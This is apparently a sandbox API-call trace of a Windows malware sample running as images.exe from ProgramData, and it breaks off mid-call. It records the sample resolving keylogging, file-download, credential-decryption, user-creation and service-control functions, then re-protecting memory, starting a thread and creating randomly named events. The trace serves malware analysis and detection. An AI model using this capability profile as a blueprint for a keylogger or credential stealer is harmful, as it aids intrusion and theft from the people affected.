[0265.145] GetProcAddress (hModule=0x74c90000, lpProcName="CreateEventA") returned 0x74cb6680 [0265.146] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleFileNameW") returned 0x74ca9b00 [0265.146] GetProcAddress (hModule=0x74c90000, lpProcName="LoadResource") returned 0x74ca76f0 [0265.146] GetProcAddress (hModule=0x74c90000, lpProcName="FindResourceW") returned 0x74cb2a40 [0265.146] GetProcAddress (hModule=0x74c90000, lpProcName="GetComputerNameW") returned 0x74cb46a0 [0265.146] GetProcAddress (hModule=0x74c90000, lpProcName="GlobalMemoryStatusEx") returned 0x74caafe0 [0265.146] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryExW") returned 0x74ca7930 [0265.146] GetProcAddress (hModule=0x74c90000, lpProcName="FindFirstFileW") returned 0x74cb6960 [0265.146] GetProcAddress (hModule=0x74c90000, lpProcName="FindNextFileW") returned 0x74cb69a0 [0265.147] GetProcAddress (hModule=0x74c90000, lpProcName="SetFilePointer") returned 0x74cb6c40 [0265.147] GetProcAddress (hModule=0x74c90000, lpProcName="GetLogicalDriveStringsW") returned 0x74cb6af0 [0265.147] GetProcAddress (hModule=0x74c90000, lpProcName="DeleteFileW") returned 0x74cb68c0 [0265.147] GetProcAddress (hModule=0x74c90000, lpProcName="CopyFileW") returned 0x74cb6ec0 [0265.147] GetProcAddress (hModule=0x74c90000, lpProcName="GetDriveTypeW") returned 0x74cb6a10 [0265.147] GetProcAddress (hModule=0x74c90000, lpProcName="EnterCriticalSection") returned 0x7779f290 [0265.147] GetProcAddress (hModule=0x74c90000, lpProcName="LeaveCriticalSection") returned 0x7779f210 [0265.147] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSection") returned 0x777ba200 [0265.147] GetProcAddress (hModule=0x74c90000, lpProcName="DeleteCriticalSection") returned 0x777b0e60 [0265.148] GetProcAddress (hModule=0x74c90000, lpProcName="GetProcessHeap") returned 0x74ca7710 [0265.148] GetProcAddress (hModule=0x74c90000, lpProcName="ReleaseMutex") returned 0x74cb67a0 [0265.148] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateProcess") returned 0x74cb5100 [0265.150] GetProcAddress (hModule=0x74c90000, lpProcName="CreateToolhelp32Snapshot") returned 0x74cb7b50 [0265.150] GetProcAddress (hModule=0x74c90000, lpProcName="Process32NextW") returned 0x74cad290 [0265.150] GetProcAddress (hModule=0x74c90000, lpProcName="Process32FirstW") returned 0x74caf5a0 [0265.150] GetProcAddress (hModule=0x74c90000, lpProcName="SizeofResource") returned 0x74ca8f80 [0265.150] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtect") returned 0x74ca7a50 [0265.150] GetProcAddress (hModule=0x74c90000, lpProcName="GetSystemDirectoryW") returned 0x74ca9fd0 [0265.150] GetProcAddress (hModule=0x74c90000, lpProcName="LockResource") returned 0x74ca7890 [0265.150] GetProcAddress (hModule=0x74c90000, lpProcName="GetWindowsDirectoryW") returned 0x74cb5120 [0265.151] GetProcAddress (hModule=0x74c90000, lpProcName="Process32First") returned 0x74caf4d0 [0265.151] GetProcAddress (hModule=0x74c90000, lpProcName="Process32Next") returned 0x74cad1c0 [0265.151] GetProcAddress (hModule=0x74c90000, lpProcName="WinExec") returned 0x74ccff70 [0265.151] GetProcAddress (hModule=0x74c90000, lpProcName="GetTempPathA") returned 0x74cb6b20 [0265.151] GetProcAddress (hModule=0x74c90000, lpProcName="HeapAlloc") returned 0x77792bd0 [0265.151] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcmpW") returned 0x74ca7970 [0265.151] GetProcAddress (hModule=0x74c90000, lpProcName="GetTickCount") returned 0x74cb5eb0 [0265.151] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcpyW") returned 0x74ccd260 [0265.151] GetProcAddress (hModule=0x74c90000, lpProcName="WideCharToMultiByte") returned 0x74ca3880 [0265.152] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcpyA") returned 0x74caea30 [0265.152] GetProcAddress (hModule=0x74c90000, lpProcName="Sleep") returned 0x74ca7990 [0265.152] GetProcAddress (hModule=0x74c90000, lpProcName="MultiByteToWideChar") returned 0x74ca2ad0 [0265.152] GetProcAddress (hModule=0x74c90000, lpProcName="GetCommandLineA") returned 0x74caab60 [0265.152] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleA") returned 0x74ca99f0 [0265.152] GetProcAddress (hModule=0x74c90000, lpProcName="ExitProcess") returned 0x74cb7b30 [0265.152] GetProcAddress (hModule=0x74c90000, lpProcName="CreateProcessW") returned 0x74cab000 [0265.152] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcatA") returned 0x74caf640 [0265.153] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcmpA") returned 0x74cacc30 [0265.153] GetProcAddress (hModule=0x74c90000, lpProcName="lstrlenA") returned 0x74ca8c80 [0265.153] GetProcAddress (hModule=0x74c90000, lpProcName="ExpandEnvironmentStringsW") returned 0x74cacd50 [0265.153] GetProcAddress (hModule=0x74c90000, lpProcName="lstrlenW") returned 0x74ca3690 [0265.153] GetProcAddress (hModule=0x74c90000, lpProcName="CloseHandle") returned 0x74cb6630 [0265.153] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcatW") returned 0x74ccd170 [0265.153] GetProcAddress (hModule=0x74c90000, lpProcName="GetLastError") returned 0x74ca3870 [0265.153] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualFree") returned 0x74ca7600 [0265.154] GetProcAddress (hModule=0x74c90000, lpProcName="GetProcAddress") returned 0x74ca78b0 [0265.154] GetProcAddress (hModule=0x74c90000, lpProcName="SetLastError") returned 0x74ca2af0 [0265.154] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleFileNameA") returned 0x74caa720 [0265.154] GetProcAddress (hModule=0x74c90000, lpProcName="CreateDirectoryW") returned 0x74cb6860 [0265.154] GetProcAddress (hModule=0x74c90000, lpProcName="LocalAlloc") returned 0x74ca7a30 [0265.154] GetProcAddress (hModule=0x74c90000, lpProcName="CreateMutexA") returned 0x74cb66c0 [0265.154] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x756d0000 [0265.154] GetProcAddress (hModule=0x756d0000, lpProcName="GetKeyState") returned 0x756eddd0 [0265.154] GetProcAddress (hModule=0x756d0000, lpProcName="GetMessageA") returned 0x756fe130 [0265.155] GetProcAddress (hModule=0x756d0000, lpProcName="DispatchMessageA") returned 0x75706f10 [0265.155] GetProcAddress (hModule=0x756d0000, lpProcName="CreateWindowExW") returned 0x756e9860 [0265.155] GetProcAddress (hModule=0x756d0000, lpProcName="CallNextHookEx") returned 0x756e3550 [0265.155] GetProcAddress (hModule=0x756d0000, lpProcName="GetAsyncKeyState") returned 0x756ee820 [0265.155] GetProcAddress (hModule=0x756d0000, lpProcName="RegisterClassW") returned 0x756e9800 [0265.155] GetProcAddress (hModule=0x756d0000, lpProcName="GetRawInputData") returned 0x7570c3f0 [0265.155] GetProcAddress (hModule=0x756d0000, lpProcName="MapVirtualKeyA") returned 0x75703e20 [0265.155] GetProcAddress (hModule=0x756d0000, lpProcName="DefWindowProcA") returned 0x777eaed0 [0265.156] GetProcAddress (hModule=0x756d0000, lpProcName="RegisterRawInputDevices") returned 0x7570c950 [0265.156] GetProcAddress (hModule=0x756d0000, lpProcName="TranslateMessage") returned 0x756ed9b0 [0265.156] GetProcAddress (hModule=0x756d0000, lpProcName="GetForegroundWindow") returned 0x75708cb0 [0265.156] GetProcAddress (hModule=0x756d0000, lpProcName="GetKeyNameTextW") returned 0x75738f40 [0265.156] GetProcAddress (hModule=0x756d0000, lpProcName="PostQuitMessage") returned 0x757072f0 [0265.156] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0265.156] GetProcAddress (hModule=0x756d0000, lpProcName="GetLastInputInfo") returned 0x756fe100 [0265.156] GetProcAddress (hModule=0x756d0000, lpProcName="wsprintfW") returned 0x756ff890 [0265.156] GetProcAddress (hModule=0x756d0000, lpProcName="GetWindowTextW") returned 0x756fcb20 [0265.157] GetProcAddress (hModule=0x756d0000, lpProcName="wsprintfA") returned 0x757004a0 [0265.157] GetProcAddress (hModule=0x756d0000, lpProcName="ToUnicode") returned 0x757047d0 [0265.157] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75830000 [0265.157] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteKeyW") returned 0x758504f0 [0265.157] GetProcAddress (hModule=0x75830000, lpProcName="RegCreateKeyExW") returned 0x7584fa20 [0265.157] GetProcAddress (hModule=0x75830000, lpProcName="RegSetValueExA") returned 0x75850a20 [0265.157] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteValueW") returned 0x75850fb0 [0265.157] GetProcAddress (hModule=0x75830000, lpProcName="LookupPrivilegeValueW") returned 0x7584e430 [0265.157] GetProcAddress (hModule=0x75830000, lpProcName="AdjustTokenPrivileges") returned 0x75850980 [0265.158] GetProcAddress (hModule=0x75830000, lpProcName="AllocateAndInitializeSid") returned 0x7584f660 [0265.158] GetProcAddress (hModule=0x75830000, lpProcName="OpenProcessToken") returned 0x7584f520 [0265.158] GetProcAddress (hModule=0x75830000, lpProcName="InitializeSecurityDescriptor") returned 0x7584fc00 [0265.158] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteKeyA") returned 0x758504a0 [0265.158] GetProcAddress (hModule=0x75830000, lpProcName="SetSecurityDescriptorDacl") returned 0x7584f830 [0265.158] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExW") returned 0x7584f350 [0265.158] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExA") returned 0x7584f790 [0265.158] GetProcAddress (hModule=0x75830000, lpProcName="RegEnumKeyExW") returned 0x7584f470 [0265.159] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryValueExA") returned 0x7584f500 [0265.159] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryInfoKeyW") returned 0x7584f640 [0265.159] GetProcAddress (hModule=0x75830000, lpProcName="RegCloseKey") returned 0x7584f620 [0265.159] GetProcAddress (hModule=0x75830000, lpProcName="OpenServiceW") returned 0x75850690 [0265.159] GetProcAddress (hModule=0x75830000, lpProcName="ChangeServiceConfigW") returned 0x758664b0 [0265.159] GetProcAddress (hModule=0x75830000, lpProcName="QueryServiceConfigW") returned 0x758505b0 [0265.159] GetProcAddress (hModule=0x75830000, lpProcName="EnumServicesStatusExW") returned 0x75850610 [0265.159] GetProcAddress (hModule=0x75830000, lpProcName="StartServiceW") returned 0x75854210 [0265.159] GetProcAddress (hModule=0x75830000, lpProcName="RegSetValueExW") returned 0x7584f7f0 [0265.160] GetProcAddress (hModule=0x75830000, lpProcName="RegCreateKeyExA") returned 0x7584fa60 [0265.160] GetProcAddress (hModule=0x75830000, lpProcName="OpenSCManagerW") returned 0x75850ed0 [0265.160] GetProcAddress (hModule=0x75830000, lpProcName="CloseServiceHandle") returned 0x75850960 [0265.160] GetProcAddress (hModule=0x75830000, lpProcName="GetTokenInformation") returned 0x7584f370 [0265.160] GetProcAddress (hModule=0x75830000, lpProcName="LookupAccountSidW") returned 0x7584f590 [0265.160] GetProcAddress (hModule=0x75830000, lpProcName="FreeSid") returned 0x75850440 [0265.160] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryValueExW") returned 0x7584f330 [0265.160] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c70000 [0265.161] GetProcAddress (hModule=0x75c70000, lpProcName="ShellExecuteExA") returned 0x75ee0290 [0265.161] GetProcAddress (hModule=0x75c70000, lpProcName="ShellExecuteExW") returned 0x75e0e690 [0265.161] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetSpecialFolderPathW") returned 0x75e1f9c0 [0265.161] GetProcAddress (hModule=0x75c70000, lpProcName="SHCreateDirectoryExW") returned 0x75e20490 [0265.161] GetProcAddress (hModule=0x75c70000, lpProcName="ShellExecuteW") returned 0x75e0d9f0 [0265.161] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetFolderPathW") returned 0x75e14e80 [0265.161] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetKnownFolderPath") returned 0x75e19710 [0265.161] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x71e40000 [0265.181] GetProcAddress (hModule=0x71e40000, lpProcName="URLDownloadToFileW") returned 0x71ebb240 [0265.181] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75520000 [0265.191] GetProcAddress (hModule=0x75520000, lpProcName="InetNtopW") returned 0x7554bd80 [0265.192] GetProcAddress (hModule=0x75520000, lpProcName="getaddrinfo") returned 0x755355c0 [0265.192] GetProcAddress (hModule=0x75520000, lpProcName="freeaddrinfo") returned 0x75535ee0 [0265.192] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x77660000 [0265.192] GetProcAddress (hModule=0x77660000, lpProcName="CoInitializeSecurity") returned 0x77543870 [0265.192] GetProcAddress (hModule=0x77660000, lpProcName="CoCreateInstance") returned 0x77500060 [0265.192] GetProcAddress (hModule=0x77660000, lpProcName="CoInitialize") returned 0x77691930 [0265.192] GetProcAddress (hModule=0x77660000, lpProcName="CoUninitialize") returned 0x774d92a0 [0265.192] GetProcAddress (hModule=0x77660000, lpProcName="CoTaskMemFree") returned 0x774d9170 [0265.193] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x74860000 [0265.193] GetProcAddress (hModule=0x74860000, lpProcName="StrStrW") returned 0x74878540 [0265.193] GetProcAddress (hModule=0x74860000, lpProcName="PathRemoveFileSpecA") returned 0x74882d80 [0265.193] GetProcAddress (hModule=0x74860000, lpProcName="StrStrA") returned 0x74883570 [0265.193] GetProcAddress (hModule=0x74860000, lpProcName="PathCombineA") returned 0x748828e0 [0265.193] GetProcAddress (hModule=0x74860000, lpProcName="PathFindFileNameW") returned 0x74877a50 [0265.193] GetProcAddress (hModule=0x74860000, lpProcName="PathFileExistsW") returned 0x74878670 [0265.193] GetProcAddress (hModule=0x74860000, lpProcName="PathFindExtensionW") returned 0x74877960 [0265.193] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x77640000 [0265.197] GetProcAddress (hModule=0x77640000, lpProcName="NetLocalGroupAddMembers") returned 0x71e282b0 [0265.209] GetProcAddress (hModule=0x77640000, lpProcName="NetUserAdd") returned 0x71e2ba50 [0265.210] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x755e0000 [0265.210] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x74690000 [0265.381] GetProcAddress (hModule=0x74690000, lpProcName="CryptUnprotectData") returned 0x746b3140 [0265.381] GetProcAddress (hModule=0x74690000, lpProcName="CryptStringToBinaryA") returned 0x746ad6d0 [0265.381] GetProcAddress (hModule=0x74690000, lpProcName="CryptStringToBinaryW") returned 0x746ad5a0 [0265.381] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75820000 [0265.384] GetProcAddress (hModule=0x75820000, lpProcName="GetModuleFileNameExW") returned 0x758213e0 [0265.384] VirtualProtect (in: lpAddress=0x2191000, dwSize=0x13000, flNewProtect=0x20, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0265.396] VirtualProtect (in: lpAddress=0x21a4000, dwSize=0x4a00, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0265.396] VirtualProtect (in: lpAddress=0x21a9000, dwSize=0x600, flNewProtect=0x4, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0265.397] VirtualProtect (in: lpAddress=0x22df000, dwSize=0x2e00, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0265.397] VirtualProtect (in: lpAddress=0x22e2000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0265.397] VirtualProtect (in: lpAddress=0x22e3000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0265.397] NtFlushInstructionCache (ProcessHandle=0xffffffff, BaseAddress=0x0, NumberOfBytesToFlush=0x0) returned 0x0 [0265.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2195ce2, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c0 [0265.412] Sleep (dwMilliseconds=0x320) [0266.227] Sleep (dwMilliseconds=0x320) [0267.039] Sleep (dwMilliseconds=0x320) [0267.853] Sleep (dwMilliseconds=0x320) [0269.119] Sleep (dwMilliseconds=0x320) [0270.143] Sleep (dwMilliseconds=0x320) [0270.958] Sleep (dwMilliseconds=0x320) [0271.826] Sleep (dwMilliseconds=0x320) [0272.754] Sleep (dwMilliseconds=0x320) [0273.611] Sleep (dwMilliseconds=0x320) [0275.342] Sleep (dwMilliseconds=0x320) [0277.385] Sleep (dwMilliseconds=0x320) [0278.302] Sleep (dwMilliseconds=0x320) [0279.163] Sleep (dwMilliseconds=0x320) [0280.619] Sleep (dwMilliseconds=0x320) [0281.463] Sleep (dwMilliseconds=0x320) [0282.586] Sleep (dwMilliseconds=0x320) [0283.692] Sleep (dwMilliseconds=0x320) Thread: id = 21 os_tid = 0xde4 Thread: id = 24 os_tid = 0xdf8 [0265.426] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\" " [0265.426] GetStartupInfoA (in: lpStartupInfo=0xa0ff3c | out: lpStartupInfo=0xa0ff3c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0265.426] GetProcessHeap () returned 0x710000 [0265.426] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x80) returned 0x716a48 [0265.427] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1c4 [0265.427] GetProcessHeap () returned 0x710000 [0265.427] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x38) returned 0x725598 [0265.427] GetProcessHeap () returned 0x710000 [0265.427] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x72b938 [0265.427] GetProcessHeap () returned 0x710000 [0265.427] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x28) returned 0x72c208 [0265.427] GetProcessHeap () returned 0x710000 [0265.427] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x50) returned 0x716ad0 [0265.427] GetProcessHeap () returned 0x710000 [0265.427] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa0) returned 0x721228 [0265.427] CoInitialize (pvReserved=0x0) returned 0x0 [0265.428] CoCreateInstance (in: rclsid=0x21a45e0*(Data1=0x62be5d10, Data2=0x60eb, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x21a73f0*(Data1=0x29840822, Data2=0x5b84, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppv=0xa0fef8 | out: ppv=0xa0fef8*=0xa61140) returned 0x0 [0265.837] SystemDeviceEnum:ICreateDevEnum:CreateClassEnumerator (in: This=0xa61140, clsidDeviceClass=0x21a45d0*(Data1=0x860bb310, Data2=0x5d01, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppenumMoniker=0xa0fefc, dwFlags=0x0 | out: ppenumMoniker=0xa0fefc*=0x0) returned 0x1 [0266.744] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x700000 [0266.744] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xa10000 [0266.745] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xa30000 [0266.745] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xa40000 [0266.745] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0xa50000 [0266.745] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x22f0000 [0266.746] GetProcessHeap () returned 0x710000 [0266.746] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x19) returned 0x731000 [0266.746] GetProcessHeap () returned 0x710000 [0266.746] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x19) returned 0x731410 [0266.746] GetProcessHeap () returned 0x710000 [0266.746] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x19) returned 0x731438 [0266.746] GetProcessHeap () returned 0x710000 [0266.746] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x19) returned 0x731078 [0266.746] GetProcessHeap () returned 0x710000 [0266.746] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x19) returned 0x7310c8 [0266.746] GetProcessHeap () returned 0x710000 [0266.746] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x19) returned 0x731140 [0266.746] Sleep (dwMilliseconds=0x1) [0266.762] GetTickCount () returned 0x16d7a [0266.762] Sleep (dwMilliseconds=0x1) [0266.774] GetTickCount () returned 0x16d8a [0266.774] Sleep (dwMilliseconds=0x1) [0266.789] GetTickCount () returned 0x16d99 [0266.789] Sleep (dwMilliseconds=0x1) [0266.805] GetTickCount () returned 0x16da9 [0266.805] Sleep (dwMilliseconds=0x1) [0266.822] GetTickCount () returned 0x16db9 [0266.822] Sleep (dwMilliseconds=0x1) [0266.836] GetTickCount () returned 0x16dc8 [0266.836] Sleep (dwMilliseconds=0x1) [0266.852] GetTickCount () returned 0x16dd8 [0266.853] Sleep (dwMilliseconds=0x1) [0266.868] GetTickCount () returned 0x16de7 [0266.868] Sleep (dwMilliseconds=0x1) [0266.884] GetTickCount () returned 0x16df7 [0266.884] Sleep (dwMilliseconds=0x1) [0266.904] GetTickCount () returned 0x16e07 [0266.904] Sleep (dwMilliseconds=0x1) [0266.918] GetTickCount () returned 0x16e16 [0266.918] Sleep (dwMilliseconds=0x1) [0266.930] GetTickCount () returned 0x16e26 [0266.930] Sleep (dwMilliseconds=0x1) [0266.945] GetTickCount () returned 0x16e36 [0266.945] Sleep (dwMilliseconds=0x1) [0266.961] GetTickCount () returned 0x16e45 [0266.961] Sleep (dwMilliseconds=0x1) [0266.976] GetTickCount () returned 0x16e55 [0266.976] Sleep (dwMilliseconds=0x1) [0266.993] GetTickCount () returned 0x16e64 [0266.993] Sleep (dwMilliseconds=0x1) [0267.008] GetTickCount () returned 0x16e74 [0267.008] Sleep (dwMilliseconds=0x1) [0267.026] GetTickCount () returned 0x16e84 [0267.026] Sleep (dwMilliseconds=0x1) [0267.039] GetTickCount () returned 0x16e93 [0267.039] Sleep (dwMilliseconds=0x1) [0267.055] GetTickCount () returned 0x16ea3 [0267.055] Sleep (dwMilliseconds=0x1) [0267.071] GetTickCount () returned 0x16eb3 [0267.071] Sleep (dwMilliseconds=0x1) [0267.120] GetTickCount () returned 0x16ee1 [0267.120] Sleep (dwMilliseconds=0x1) [0267.136] GetTickCount () returned 0x16ef1 [0267.136] Sleep (dwMilliseconds=0x1) [0267.150] GetTickCount () returned 0x16f01 [0267.150] Sleep (dwMilliseconds=0x1) [0267.167] GetTickCount () returned 0x16f10 [0267.167] Sleep (dwMilliseconds=0x1) [0267.181] GetTickCount () returned 0x16f20 [0267.181] Sleep (dwMilliseconds=0x1) [0267.198] GetTickCount () returned 0x16f30 [0267.199] Sleep (dwMilliseconds=0x1) [0267.211] GetTickCount () returned 0x16f3f [0267.211] Sleep (dwMilliseconds=0x1) [0267.229] GetTickCount () returned 0x16f4f [0267.229] Sleep (dwMilliseconds=0x1) [0267.249] GetTickCount () returned 0x16f5e [0267.249] Sleep (dwMilliseconds=0x1) [0267.261] GetTickCount () returned 0x16f6e [0267.261] Sleep (dwMilliseconds=0x1) [0267.279] GetTickCount () returned 0x16f7e [0267.279] Sleep (dwMilliseconds=0x1) [0267.297] GetTickCount () returned 0x16f8d [0267.297] Sleep (dwMilliseconds=0x1) [0267.305] GetTickCount () returned 0x16f9d [0267.305] Sleep (dwMilliseconds=0x1) [0267.322] GetTickCount () returned 0x16fad [0267.322] Sleep (dwMilliseconds=0x1) [0267.339] GetTickCount () returned 0x16fbc [0267.339] Sleep (dwMilliseconds=0x1) [0267.351] GetTickCount () returned 0x16fcc [0267.351] Sleep (dwMilliseconds=0x1) [0267.369] GetTickCount () returned 0x16fdb [0267.369] Sleep (dwMilliseconds=0x1) [0267.383] GetTickCount () returned 0x16feb [0267.383] Sleep (dwMilliseconds=0x1) [0267.400] GetTickCount () returned 0x16ffb [0267.400] Sleep (dwMilliseconds=0x1) [0267.418] GetTickCount () returned 0x1700a [0267.418] Sleep (dwMilliseconds=0x1) [0267.435] GetTickCount () returned 0x1701a [0267.435] Sleep (dwMilliseconds=0x1) [0267.445] GetTickCount () returned 0x1702a [0267.446] Sleep (dwMilliseconds=0x1) [0267.461] GetTickCount () returned 0x17039 [0267.461] Sleep (dwMilliseconds=0x1) [0267.476] GetTickCount () returned 0x17049 [0267.476] Sleep (dwMilliseconds=0x1) [0267.492] GetTickCount () returned 0x17058 [0267.492] Sleep (dwMilliseconds=0x1) [0267.509] GetTickCount () returned 0x17068 [0267.509] Sleep (dwMilliseconds=0x1) [0267.532] GetTickCount () returned 0x17078 [0267.532] Sleep (dwMilliseconds=0x1) [0267.544] GetTickCount () returned 0x17087 [0267.544] Sleep (dwMilliseconds=0x1) [0267.554] GetTickCount () returned 0x17097 [0267.554] Sleep (dwMilliseconds=0x1) [0267.580] GetTickCount () returned 0x170a7 [0267.580] Sleep (dwMilliseconds=0x1) [0267.588] GetTickCount () returned 0x170b6 [0267.588] Sleep (dwMilliseconds=0x1) [0267.608] GetTickCount () returned 0x170c6 [0267.608] Sleep (dwMilliseconds=0x1) [0267.620] GetTickCount () returned 0x170d5 [0267.620] Sleep (dwMilliseconds=0x1) [0267.636] GetTickCount () returned 0x170e5 [0267.636] Sleep (dwMilliseconds=0x1) [0267.654] GetTickCount () returned 0x170f5 [0267.654] Sleep (dwMilliseconds=0x1) [0267.664] GetTickCount () returned 0x17104 [0267.664] Sleep (dwMilliseconds=0x1) [0267.680] GetTickCount () returned 0x17114 [0267.680] Sleep (dwMilliseconds=0x1) [0267.700] GetTickCount () returned 0x17124 [0267.700] Sleep (dwMilliseconds=0x1) [0267.714] GetTickCount () returned 0x17133 [0267.715] lstrlenA (lpString="S4Bs1mImNi") returned 10 [0267.715] lstrlenA (lpString="S4Bs1mImNi") returned 10 [0267.715] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.715] lstrcpyA (in: lpString1=0x2300000, lpString2="S4Bs1mImNi" | out: lpString1="S4Bs1mImNi") returned="S4Bs1mImNi" [0267.715] VirtualFree (lpAddress=0x700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.716] lstrlenA (lpString="S4Bs1mImNi") returned 10 [0267.716] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x700000 [0267.716] lstrcatA (in: lpString1="", lpString2="S4Bs1mImNi" | out: lpString1="S4Bs1mImNi") returned="S4Bs1mImNi" [0267.716] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="S4Bs1mImNi") returned 0x248 [0267.716] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.717] lstrlenA (lpString="yqAkRkW2PI") returned 10 [0267.717] lstrlenA (lpString="yqAkRkW2PI") returned 10 [0267.717] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.718] lstrcpyA (in: lpString1=0x2300000, lpString2="yqAkRkW2PI" | out: lpString1="yqAkRkW2PI") returned="yqAkRkW2PI" [0267.718] VirtualFree (lpAddress=0xa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.718] lstrlenA (lpString="yqAkRkW2PI") returned 10 [0267.718] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0xa10000 [0267.718] lstrcatA (in: lpString1="", lpString2="yqAkRkW2PI" | out: lpString1="yqAkRkW2PI") returned="yqAkRkW2PI" [0267.718] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="yqAkRkW2PI") returned 0x24c [0267.719] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.719] lstrlenA (lpString="V2XmAUG09c") returned 10 [0267.719] lstrlenA (lpString="V2XmAUG09c") returned 10 [0267.719] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.719] lstrcpyA (in: lpString1=0x2300000, 